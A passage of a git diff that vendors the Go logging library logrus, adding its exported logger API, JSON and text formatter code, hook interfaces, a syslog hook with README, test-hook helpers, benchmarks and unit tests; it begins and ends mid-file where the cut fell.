+		"size":   9009,
+	}).Panic("It's over 9000!")
+
+	// Output:
+	// level=debug msg="Started observing beach" animal=walrus number=8
+	// level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10
+	// level=warning msg="The group's number increased tremendously!" number=122 omg=true
+	// level=debug msg="Temperature changes" temperature=-4
+	// level=panic msg="It's over 9000!" animal=orca size=9009
+	// level=error msg="The ice breaks!" err_animal=orca err_level=panic err_message="It's over 9000!" err_size=9009 number=100 omg=true
+}
diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/Sirupsen/logrus/example_hook_test.go
new file mode 100644
index 0000000000..d4ddffca37
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/example_hook_test.go
@@ -0,0 +1,35 @@
+package logrus_test
+
+import (
+	"github.com/sirupsen/logrus"
+	"gopkg.in/gemnasium/logrus-airbrake-hook.v2"
+	"os"
+)
+
+func Example_hook() {
+	var log = logrus.New()
+	log.Formatter = new(logrus.TextFormatter)                     // default
+	log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output
+	log.Hooks.Add(airbrake.NewHook(123, "xyz", "development"))
+	log.Out = os.Stdout
+
+	log.WithFields(logrus.Fields{
+		"animal": "walrus",
+		"size":   10,
+	}).Info("A group of walrus emerges from the ocean")
+
+	log.WithFields(logrus.Fields{
+		"omg":    true,
+		"number": 122,
+	}).Warn("The group's number increased tremendously!")
+
+	log.WithFields(logrus.Fields{
+		"omg":    true,
+		"number": 100,
+	}).Error("The ice breaks!")
+
+	// Output:
+	// level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10
+	// level=warning msg="The group's number increased tremendously!" number=122 omg=true
+	// level=error msg="The ice breaks!" number=100 omg=true
+}
diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/Sirupsen/logrus/exported.go
new file mode 100644
index 0000000000..013183edab
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/exported.go
@@ -0,0 +1,193 @@
+package logrus
+
+import (
+	"io"
+)
+
+var (
+	// std is the name of the standard logger in stdlib `log`
+	std = New()
+)
+
+func StandardLogger() *Logger {
+	return std
+}
+
+// SetOutput sets the standard logger output.
+func SetOutput(out io.Writer) {
+	std.mu.Lock()
+	defer std.mu.Unlock()
+	std.Out = out
+}
+
+// SetFormatter sets the standard logger formatter.
+func SetFormatter(formatter Formatter) {
+	std.mu.Lock()
+	defer std.mu.Unlock()
+	std.Formatter = formatter
+}
+
+// SetLevel sets the standard logger level.
+func SetLevel(level Level) {
+	std.mu.Lock()
+	defer std.mu.Unlock()
+	std.SetLevel(level)
+}
+
+// GetLevel returns the standard logger level.
+func GetLevel() Level {
+	std.mu.Lock()
+	defer std.mu.Unlock()
+	return std.level()
+}
+
+// AddHook adds a hook to the standard logger hooks.
+func AddHook(hook Hook) {
+	std.mu.Lock()
+	defer std.mu.Unlock()
+	std.Hooks.Add(hook)
+}
+
+// WithError creates an entry from the standard logger and adds an error to it, using the value defined in ErrorKey as key.
+func WithError(err error) *Entry {
+	return std.WithField(ErrorKey, err)
+}
+
+// WithField creates an entry from the standard logger and adds a field to
+// it. If you want multiple fields, use `WithFields`.
+//
+// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal
+// or Panic on the Entry it returns.
+func WithField(key string, value interface{}) *Entry {
+	return std.WithField(key, value)
+}
+
+// WithFields creates an entry from the standard logger and adds multiple
+// fields to it. This is simply a helper for `WithField`, invoking it
+// once for each field.
+//
+// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal
+// or Panic on the Entry it returns.
+func WithFields(fields Fields) *Entry {
+	return std.WithFields(fields)
+}
+
+// Debug logs a message at level Debug on the standard logger.
+func Debug(args ...interface{}) {
+	std.Debug(args...)
+}
+
+// Print logs a message at level Info on the standard logger.
+func Print(args ...interface{}) {
+	std.Print(args...)
+}
+
+// Info logs a message at level Info on the standard logger.
+func Info(args ...interface{}) {
+	std.Info(args...)
+}
+
+// Warn logs a message at level Warn on the standard logger.
+func Warn(args ...interface{}) {
+	std.Warn(args...)
+}
+
+// Warning logs a message at level Warn on the standard logger.
+func Warning(args ...interface{}) {
+	std.Warning(args...)
+}
+
+// Error logs a message at level Error on the standard logger.
+func Error(args ...interface{}) {
+	std.Error(args...)
+}
+
+// Panic logs a message at level Panic on the standard logger.
+func Panic(args ...interface{}) {
+	std.Panic(args...)
+}
+
+// Fatal logs a message at level Fatal on the standard logger.
+func Fatal(args ...interface{}) {
+	std.Fatal(args...)
+}
+
+// Debugf logs a message at level Debug on the standard logger.
+func Debugf(format string, args ...interface{}) {
+	std.Debugf(format, args...)
+}
+
+// Printf logs a message at level Info on the standard logger.
+func Printf(format string, args ...interface{}) {
+	std.Printf(format, args...)
+}
+
+// Infof logs a message at level Info on the standard logger.
+func Infof(format string, args ...interface{}) {
+	std.Infof(format, args...)
+}
+
+// Warnf logs a message at level Warn on the standard logger.
+func Warnf(format string, args ...interface{}) {
+	std.Warnf(format, args...)
+}
+
+// Warningf logs a message at level Warn on the standard logger.
+func Warningf(format string, args ...interface{}) {
+	std.Warningf(format, args...)
+}
+
+// Errorf logs a message at level Error on the standard logger.
+func Errorf(format string, args ...interface{}) {
+	std.Errorf(format, args...)
+}
+
+// Panicf logs a message at level Panic on the standard logger.
+func Panicf(format string, args ...interface{}) {
+	std.Panicf(format, args...)
+}
+
+// Fatalf logs a message at level Fatal on the standard logger.
+func Fatalf(format string, args ...interface{}) {
+	std.Fatalf(format, args...)
+}
+
+// Debugln logs a message at level Debug on the standard logger.
+func Debugln(args ...interface{}) {
+	std.Debugln(args...)
+}
+
+// Println logs a message at level Info on the standard logger.
+func Println(args ...interface{}) {
+	std.Println(args...)
+}
+
+// Infoln logs a message at level Info on the standard logger.
+func Infoln(args ...interface{}) {
+	std.Infoln(args...)
+}
+
+// Warnln logs a message at level Warn on the standard logger.
+func Warnln(args ...interface{}) {
+	std.Warnln(args...)
+}
+
+// Warningln logs a message at level Warn on the standard logger.
+func Warningln(args ...interface{}) {
+	std.Warningln(args...)
+}
+
+// Errorln logs a message at level Error on the standard logger.
+func Errorln(args ...interface{}) {
+	std.Errorln(args...)
+}
+
+// Panicln logs a message at level Panic on the standard logger.
+func Panicln(args ...interface{}) {
+	std.Panicln(args...)
+}
+
+// Fatalln logs a message at level Fatal on the standard logger.
+func Fatalln(args ...interface{}) {
+	std.Fatalln(args...)
+}
diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/Sirupsen/logrus/formatter.go
new file mode 100644
index 0000000000..b183ff5b1d
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/formatter.go
@@ -0,0 +1,45 @@
+package logrus
+
+import "time"
+
+const defaultTimestampFormat = time.RFC3339
+
+// The Formatter interface is used to implement a custom Formatter. It takes an
+// `Entry`. It exposes all the fields, including the default ones:
+//
+// * `entry.Data["msg"]`. The message passed from Info, Warn, Error ..
+// * `entry.Data["time"]`. The timestamp.
+// * `entry.Data["level"]. The level the entry was logged at.
+//
+// Any additional fields added with `WithField` or `WithFields` are also in
+// `entry.Data`. Format is expected to return an array of bytes which are then
+// logged to `logger.Out`.
+type Formatter interface {
+	Format(*Entry) ([]byte, error)
+}
+
+// This is to not silently overwrite `time`, `msg` and `level` fields when
+// dumping it. If this code wasn't there doing:
+//
+//  logrus.WithField("level", 1).Info("hello")
+//
+// Would just silently drop the user provided level. Instead with this code
+// it'll logged as:
+//
+//  {"level": "info", "fields.level": 1, "msg": "hello", "time": "..."}
+//
+// It's not exported because it's still using Data in an opinionated way. It's to
+// avoid code duplication between the two default formatters.
+func prefixFieldClashes(data Fields) {
+	if t, ok := data["time"]; ok {
+		data["fields.time"] = t
+	}
+
+	if m, ok := data["msg"]; ok {
+		data["fields.msg"] = m
+	}
+
+	if l, ok := data["level"]; ok {
+		data["fields.level"] = l
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go
new file mode 100644
index 0000000000..d9481589f5
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go
@@ -0,0 +1,101 @@
+package logrus
+
+import (
+	"fmt"
+	"testing"
+	"time"
+)
+
+// smallFields is a small size data set for benchmarking
+var smallFields = Fields{
+	"foo":   "bar",
+	"baz":   "qux",
+	"one":   "two",
+	"three": "four",
+}
+
+// largeFields is a large size data set for benchmarking
+var largeFields = Fields{
+	"foo":       "bar",
+	"baz":       "qux",
+	"one":       "two",
+	"three":     "four",
+	"five":      "six",
+	"seven":     "eight",
+	"nine":      "ten",
+	"eleven":    "twelve",
+	"thirteen":  "fourteen",
+	"fifteen":   "sixteen",
+	"seventeen": "eighteen",
+	"nineteen":  "twenty",
+	"a":         "b",
+	"c":         "d",
+	"e":         "f",
+	"g":         "h",
+	"i":         "j",
+	"k":         "l",
+	"m":         "n",
+	"o":         "p",
+	"q":         "r",
+	"s":         "t",
+	"u":         "v",
+	"w":         "x",
+	"y":         "z",
+	"this":      "will",
+	"make":      "thirty",
+	"entries":   "yeah",
+}
+
+var errorFields = Fields{
+	"foo": fmt.Errorf("bar"),
+	"baz": fmt.Errorf("qux"),
+}
+
+func BenchmarkErrorTextFormatter(b *testing.B) {
+	doBenchmark(b, &TextFormatter{DisableColors: true}, errorFields)
+}
+
+func BenchmarkSmallTextFormatter(b *testing.B) {
+	doBenchmark(b, &TextFormatter{DisableColors: true}, smallFields)
+}
+
+func BenchmarkLargeTextFormatter(b *testing.B) {
+	doBenchmark(b, &TextFormatter{DisableColors: true}, largeFields)
+}
+
+func BenchmarkSmallColoredTextFormatter(b *testing.B) {
+	doBenchmark(b, &TextFormatter{ForceColors: true}, smallFields)
+}
+
+func BenchmarkLargeColoredTextFormatter(b *testing.B) {
+	doBenchmark(b, &TextFormatter{ForceColors: true}, largeFields)
+}
+
+func BenchmarkSmallJSONFormatter(b *testing.B) {
+	doBenchmark(b, &JSONFormatter{}, smallFields)
+}
+
+func BenchmarkLargeJSONFormatter(b *testing.B) {
+	doBenchmark(b, &JSONFormatter{}, largeFields)
+}
+
+func doBenchmark(b *testing.B, formatter Formatter, fields Fields) {
+	logger := New()
+
+	entry := &Entry{
+		Time:    time.Time{},
+		Level:   InfoLevel,
+		Message: "message",
+		Data:    fields,
+		Logger:  logger,
+	}
+	var d []byte
+	var err error
+	for i := 0; i < b.N; i++ {
+		d, err = formatter.Format(entry)
+		if err != nil {
+			b.Fatal(err)
+		}
+		b.SetBytes(int64(len(d)))
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/Sirupsen/logrus/hook_test.go
new file mode 100644
index 0000000000..4fea7514e1
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hook_test.go
@@ -0,0 +1,144 @@
+package logrus
+
+import (
+	"sync"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+type TestHook struct {
+	Fired bool
+}
+
+func (hook *TestHook) Fire(entry *Entry) error {
+	hook.Fired = true
+	return nil
+}
+
+func (hook *TestHook) Levels() []Level {
+	return []Level{
+		DebugLevel,
+		InfoLevel,
+		WarnLevel,
+		ErrorLevel,
+		FatalLevel,
+		PanicLevel,
+	}
+}
+
+func TestHookFires(t *testing.T) {
+	hook := new(TestHook)
+
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Hooks.Add(hook)
+		assert.Equal(t, hook.Fired, false)
+
+		log.Print("test")
+	}, func(fields Fields) {
+		assert.Equal(t, hook.Fired, true)
+	})
+}
+
+type ModifyHook struct {
+}
+
+func (hook *ModifyHook) Fire(entry *Entry) error {
+	entry.Data["wow"] = "whale"
+	return nil
+}
+
+func (hook *ModifyHook) Levels() []Level {
+	return []Level{
+		DebugLevel,
+		InfoLevel,
+		WarnLevel,
+		ErrorLevel,
+		FatalLevel,
+		PanicLevel,
+	}
+}
+
+func TestHookCanModifyEntry(t *testing.T) {
+	hook := new(ModifyHook)
+
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Hooks.Add(hook)
+		log.WithField("wow", "elephant").Print("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["wow"], "whale")
+	})
+}
+
+func TestCanFireMultipleHooks(t *testing.T) {
+	hook1 := new(ModifyHook)
+	hook2 := new(TestHook)
+
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Hooks.Add(hook1)
+		log.Hooks.Add(hook2)
+
+		log.WithField("wow", "elephant").Print("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["wow"], "whale")
+		assert.Equal(t, hook2.Fired, true)
+	})
+}
+
+type ErrorHook struct {
+	Fired bool
+}
+
+func (hook *ErrorHook) Fire(entry *Entry) error {
+	hook.Fired = true
+	return nil
+}
+
+func (hook *ErrorHook) Levels() []Level {
+	return []Level{
+		ErrorLevel,
+	}
+}
+
+func TestErrorHookShouldntFireOnInfo(t *testing.T) {
+	hook := new(ErrorHook)
+
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Hooks.Add(hook)
+		log.Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, hook.Fired, false)
+	})
+}
+
+func TestErrorHookShouldFireOnError(t *testing.T) {
+	hook := new(ErrorHook)
+
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Hooks.Add(hook)
+		log.Error("test")
+	}, func(fields Fields) {
+		assert.Equal(t, hook.Fired, true)
+	})
+}
+
+func TestAddHookRace(t *testing.T) {
+	var wg sync.WaitGroup
+	wg.Add(2)
+	hook := new(ErrorHook)
+	LogAndAssertJSON(t, func(log *Logger) {
+		go func() {
+			defer wg.Done()
+			log.AddHook(hook)
+		}()
+		go func() {
+			defer wg.Done()
+			log.Error("test")
+		}()
+		wg.Wait()
+	}, func(fields Fields) {
+		// the line may have been logged
+		// before the hook was added, so we can't
+		// actually assert on the hook
+	})
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/Sirupsen/logrus/hooks.go
new file mode 100644
index 0000000000..3f151cdc39
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks.go
@@ -0,0 +1,34 @@
+package logrus
+
+// A hook to be fired when logging on the logging levels returned from
+// `Levels()` on your implementation of the interface. Note that this is not
+// fired in a goroutine or a channel with workers, you should handle such
+// functionality yourself if your call is non-blocking and you don't wish for
+// the logging calls for levels returned from `Levels()` to block.
+type Hook interface {
+	Levels() []Level
+	Fire(*Entry) error
+}
+
+// Internal type for storing the hooks on a logger instance.
+type LevelHooks map[Level][]Hook
+
+// Add a hook to an instance of logger. This is called with
+// `log.Hooks.Add(new(MyHook))` where `MyHook` implements the `Hook` interface.
+func (hooks LevelHooks) Add(hook Hook) {
+	for _, level := range hook.Levels() {
+		hooks[level] = append(hooks[level], hook)
+	}
+}
+
+// Fire all the hooks for the passed level. Used by `entry.log` to fire
+// appropriate hooks for a log entry.
+func (hooks LevelHooks) Fire(level Level, entry *Entry) error {
+	for _, hook := range hooks[level] {
+		if err := hook.Fire(entry); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md
new file mode 100644
index 0000000000..1bbc0f72d3
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md
@@ -0,0 +1,39 @@
+# Syslog Hooks for Logrus <img src="http://i.imgur.com/hTeVwmJ.png" width="40" height="40" alt=":walrus:" class="emoji" title=":walrus:"/>
+
+## Usage
+
+```go
+import (
+  "log/syslog"
+  "github.com/sirupsen/logrus"
+  lSyslog "github.com/sirupsen/logrus/hooks/syslog"
+)
+
+func main() {
+  log       := logrus.New()
+  hook, err := lSyslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "")
+
+  if err == nil {
+    log.Hooks.Add(hook)
+  }
+}
+```
+
+If you want to connect to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). Just assign empty string to the first two parameters of `NewSyslogHook`. It should look like the following.
+
+```go
+import (
+  "log/syslog"
+  "github.com/sirupsen/logrus"
+  lSyslog "github.com/sirupsen/logrus/hooks/syslog"
+)
+
+func main() {
+  log       := logrus.New()
+  hook, err := lSyslog.NewSyslogHook("", "", syslog.LOG_INFO, "")
+
+  if err == nil {
+    log.Hooks.Add(hook)
+  }
+}
+```
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go
new file mode 100644
index 0000000000..329ce0d60c
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go
@@ -0,0 +1,55 @@
+// +build !windows,!nacl,!plan9
+
+package syslog
+
+import (
+	"fmt"
+	"log/syslog"
+	"os"
+
+	"github.com/sirupsen/logrus"
+)
+
+// SyslogHook to send logs via syslog.
+type SyslogHook struct {
+	Writer        *syslog.Writer
+	SyslogNetwork string
+	SyslogRaddr   string
+}
+
+// Creates a hook to be added to an instance of logger. This is called with
+// `hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_DEBUG, "")`
+// `if err == nil { log.Hooks.Add(hook) }`
+func NewSyslogHook(network, raddr string, priority syslog.Priority, tag string) (*SyslogHook, error) {
+	w, err := syslog.Dial(network, raddr, priority, tag)
+	return &SyslogHook{w, network, raddr}, err
+}
+
+func (hook *SyslogHook) Fire(entry *logrus.Entry) error {
+	line, err := entry.String()
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "Unable to read entry, %v", err)
+		return err
+	}
+
+	switch entry.Level {
+	case logrus.PanicLevel:
+		return hook.Writer.Crit(line)
+	case logrus.FatalLevel:
+		return hook.Writer.Crit(line)
+	case logrus.ErrorLevel:
+		return hook.Writer.Err(line)
+	case logrus.WarnLevel:
+		return hook.Writer.Warning(line)
+	case logrus.InfoLevel:
+		return hook.Writer.Info(line)
+	case logrus.DebugLevel:
+		return hook.Writer.Debug(line)
+	default:
+		return nil
+	}
+}
+
+func (hook *SyslogHook) Levels() []logrus.Level {
+	return logrus.AllLevels
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go
new file mode 100644
index 0000000000..5ec3a44454
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go
@@ -0,0 +1,27 @@
+package syslog
+
+import (
+	"log/syslog"
+	"testing"
+
+	"github.com/sirupsen/logrus"
+)
+
+func TestLocalhostAddAndPrint(t *testing.T) {
+	log := logrus.New()
+	hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "")
+
+	if err != nil {
+		t.Errorf("Unable to connect to local syslog.")
+	}
+
+	log.Hooks.Add(hook)
+
+	for _, level := range hook.Levels() {
+		if len(log.Hooks[level]) != 1 {
+			t.Errorf("SyslogHook was not added. The length of log.Hooks[%v]: %v", level, len(log.Hooks[level]))
+		}
+	}
+
+	log.Info("Congratulations!")
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go
new file mode 100644
index 0000000000..62c4845df7
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go
@@ -0,0 +1,95 @@
+// The Test package is used for testing logrus. It is here for backwards
+// compatibility from when logrus' organization was upper-case. Please use
+// lower-case logrus and the `null` package instead of this one.
+package test
+
+import (
+	"io/ioutil"
+	"sync"
+
+	"github.com/sirupsen/logrus"
+)
+
+// Hook is a hook designed for dealing with logs in test scenarios.
+type Hook struct {
+	// Entries is an array of all entries that have been received by this hook.
+	// For safe access, use the AllEntries() method, rather than reading this
+	// value directly.
+	Entries []*logrus.Entry
+	mu      sync.RWMutex
+}
+
+// NewGlobal installs a test hook for the global logger.
+func NewGlobal() *Hook {
+
+	hook := new(Hook)
+	logrus.AddHook(hook)
+
+	return hook
+
+}
+
+// NewLocal installs a test hook for a given local logger.
+func NewLocal(logger *logrus.Logger) *Hook {
+
+	hook := new(Hook)
+	logger.Hooks.Add(hook)
+
+	return hook
+
+}
+
+// NewNullLogger creates a discarding logger and installs the test hook.
+func NewNullLogger() (*logrus.Logger, *Hook) {
+
+	logger := logrus.New()
+	logger.Out = ioutil.Discard
+
+	return logger, NewLocal(logger)
+
+}
+
+func (t *Hook) Fire(e *logrus.Entry) error {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+	t.Entries = append(t.Entries, e)
+	return nil
+}
+
+func (t *Hook) Levels() []logrus.Level {
+	return logrus.AllLevels
+}
+
+// LastEntry returns the last entry that was logged or nil.
+func (t *Hook) LastEntry() *logrus.Entry {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+	i := len(t.Entries) - 1
+	if i < 0 {
+		return nil
+	}
+	// Make a copy, for safety
+	e := *t.Entries[i]
+	return &e
+}
+
+// AllEntries returns all entries that were logged.
+func (t *Hook) AllEntries() []*logrus.Entry {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+	// Make a copy so the returned value won't race with future log requests
+	entries := make([]*logrus.Entry, len(t.Entries))
+	for i, entry := range t.Entries {
+		// Make a copy, for safety
+		e := *entry
+		entries[i] = &e
+	}
+	return entries
+}
+
+// Reset removes all Entries from this test hook.
+func (t *Hook) Reset() {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+	t.Entries = make([]*logrus.Entry, 0)
+}
diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go
new file mode 100644
index 0000000000..dea768e6c5
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go
@@ -0,0 +1,61 @@
+package test
+
+import (
+	"sync"
+	"testing"
+
+	"github.com/sirupsen/logrus"
+	"github.com/stretchr/testify/assert"
+)
+
+func TestAllHooks(t *testing.T) {
+	assert := assert.New(t)
+
+	logger, hook := NewNullLogger()
+	assert.Nil(hook.LastEntry())
+	assert.Equal(0, len(hook.Entries))
+
+	logger.Error("Hello error")
+	assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level)
+	assert.Equal("Hello error", hook.LastEntry().Message)
+	assert.Equal(1, len(hook.Entries))
+
+	logger.Warn("Hello warning")
+	assert.Equal(logrus.WarnLevel, hook.LastEntry().Level)
+	assert.Equal("Hello warning", hook.LastEntry().Message)
+	assert.Equal(2, len(hook.Entries))
+
+	hook.Reset()
+	assert.Nil(hook.LastEntry())
+	assert.Equal(0, len(hook.Entries))
+
+	hook = NewGlobal()
+
+	logrus.Error("Hello error")
+	assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level)
+	assert.Equal("Hello error", hook.LastEntry().Message)
+	assert.Equal(1, len(hook.Entries))
+}
+
+func TestLoggingWithHooksRace(t *testing.T) {
+	assert := assert.New(t)
+	logger, hook := NewNullLogger()
+
+	var wg sync.WaitGroup
+	wg.Add(100)
+
+	for i := 0; i < 100; i++ {
+		go func() {
+			logger.Info("info")
+			wg.Done()
+		}()
+	}
+
+	assert.Equal(logrus.InfoLevel, hook.LastEntry().Level)
+	assert.Equal("info", hook.LastEntry().Message)
+
+	wg.Wait()
+
+	entries := hook.AllEntries()
+	assert.Equal(100, len(entries))
+}
diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/Sirupsen/logrus/json_formatter.go
new file mode 100644
index 0000000000..fb01c1b104
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/json_formatter.go
@@ -0,0 +1,79 @@
+package logrus
+
+import (
+	"encoding/json"
+	"fmt"
+)
+
+type fieldKey string
+
+// FieldMap allows customization of the key names for default fields.
+type FieldMap map[fieldKey]string
+
+// Default key names for the default fields
+const (
+	FieldKeyMsg   = "msg"
+	FieldKeyLevel = "level"
+	FieldKeyTime  = "time"
+)
+
+func (f FieldMap) resolve(key fieldKey) string {
+	if k, ok := f[key]; ok {
+		return k
+	}
+
+	return string(key)
+}
+
+// JSONFormatter formats logs into parsable json
+type JSONFormatter struct {
+	// TimestampFormat sets the format used for marshaling timestamps.
+	TimestampFormat string
+
+	// DisableTimestamp allows disabling automatic timestamps in output
+	DisableTimestamp bool
+
+	// FieldMap allows users to customize the names of keys for default fields.
+	// As an example:
+	// formatter := &JSONFormatter{
+	//   	FieldMap: FieldMap{
+	// 		 FieldKeyTime: "@timestamp",
+	// 		 FieldKeyLevel: "@level",
+	// 		 FieldKeyMsg: "@message",
+	//    },
+	// }
+	FieldMap FieldMap
+}
+
+// Format renders a single log entry
+func (f *JSONFormatter) Format(entry *Entry) ([]byte, error) {
+	data := make(Fields, len(entry.Data)+3)
+	for k, v := range entry.Data {
+		switch v := v.(type) {
+		case error:
+			// Otherwise errors are ignored by `encoding/json`
+			// https://github.com/sirupsen/logrus/issues/137
+			data[k] = v.Error()
+		default:
+			data[k] = v
+		}
+	}
+	prefixFieldClashes(data)
+
+	timestampFormat := f.TimestampFormat
+	if timestampFormat == "" {
+		timestampFormat = defaultTimestampFormat
+	}
+
+	if !f.DisableTimestamp {
+		data[f.FieldMap.resolve(FieldKeyTime)] = entry.Time.Format(timestampFormat)
+	}
+	data[f.FieldMap.resolve(FieldKeyMsg)] = entry.Message
+	data[f.FieldMap.resolve(FieldKeyLevel)] = entry.Level.String()
+
+	serialized, err := json.Marshal(data)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err)
+	}
+	return append(serialized, '\n'), nil
+}
diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go
new file mode 100644
index 0000000000..51093a79ba
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go
@@ -0,0 +1,199 @@
+package logrus
+
+import (
+	"encoding/json"
+	"errors"
+	"strings"
+	"testing"
+)
+
+func TestErrorNotLost(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("error", errors.New("wild walrus")))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	entry := make(map[string]interface{})
+	err = json.Unmarshal(b, &entry)
+	if err != nil {
+		t.Fatal("Unable to unmarshal formatted entry: ", err)
+	}
+
+	if entry["error"] != "wild walrus" {
+		t.Fatal("Error field not set")
+	}
+}
+
+func TestErrorNotLostOnFieldNotNamedError(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("omg", errors.New("wild walrus")))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	entry := make(map[string]interface{})
+	err = json.Unmarshal(b, &entry)
+	if err != nil {
+		t.Fatal("Unable to unmarshal formatted entry: ", err)
+	}
+
+	if entry["omg"] != "wild walrus" {
+		t.Fatal("Error field not set")
+	}
+}
+
+func TestFieldClashWithTime(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("time", "right now!"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	entry := make(map[string]interface{})
+	err = json.Unmarshal(b, &entry)
+	if err != nil {
+		t.Fatal("Unable to unmarshal formatted entry: ", err)
+	}
+
+	if entry["fields.time"] != "right now!" {
+		t.Fatal("fields.time not set to original time field")
+	}
+
+	if entry["time"] != "0001-01-01T00:00:00Z" {
+		t.Fatal("time field not set to current time, was: ", entry["time"])
+	}
+}
+
+func TestFieldClashWithMsg(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("msg", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	entry := make(map[string]interface{})
+	err = json.Unmarshal(b, &entry)
+	if err != nil {
+		t.Fatal("Unable to unmarshal formatted entry: ", err)
+	}
+
+	if entry["fields.msg"] != "something" {
+		t.Fatal("fields.msg not set to original msg field")
+	}
+}
+
+func TestFieldClashWithLevel(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	entry := make(map[string]interface{})
+	err = json.Unmarshal(b, &entry)
+	if err != nil {
+		t.Fatal("Unable to unmarshal formatted entry: ", err)
+	}
+
+	if entry["fields.level"] != "something" {
+		t.Fatal("fields.level not set to original level field")
+	}
+}
+
+func TestJSONEntryEndsWithNewline(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+
+	if b[len(b)-1] != '\n' {
+		t.Fatal("Expected JSON log entry to end with a newline")
+	}
+}
+
+func TestJSONMessageKey(t *testing.T) {
+	formatter := &JSONFormatter{
+		FieldMap: FieldMap{
+			FieldKeyMsg: "message",
+		},
+	}
+
+	b, err := formatter.Format(&Entry{Message: "oh hai"})
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+	s := string(b)
+	if !(strings.Contains(s, "message") && strings.Contains(s, "oh hai")) {
+		t.Fatal("Expected JSON to format message key")
+	}
+}
+
+func TestJSONLevelKey(t *testing.T) {
+	formatter := &JSONFormatter{
+		FieldMap: FieldMap{
+			FieldKeyLevel: "somelevel",
+		},
+	}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+	s := string(b)
+	if !strings.Contains(s, "somelevel") {
+		t.Fatal("Expected JSON to format level key")
+	}
+}
+
+func TestJSONTimeKey(t *testing.T) {
+	formatter := &JSONFormatter{
+		FieldMap: FieldMap{
+			FieldKeyTime: "timeywimey",
+		},
+	}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
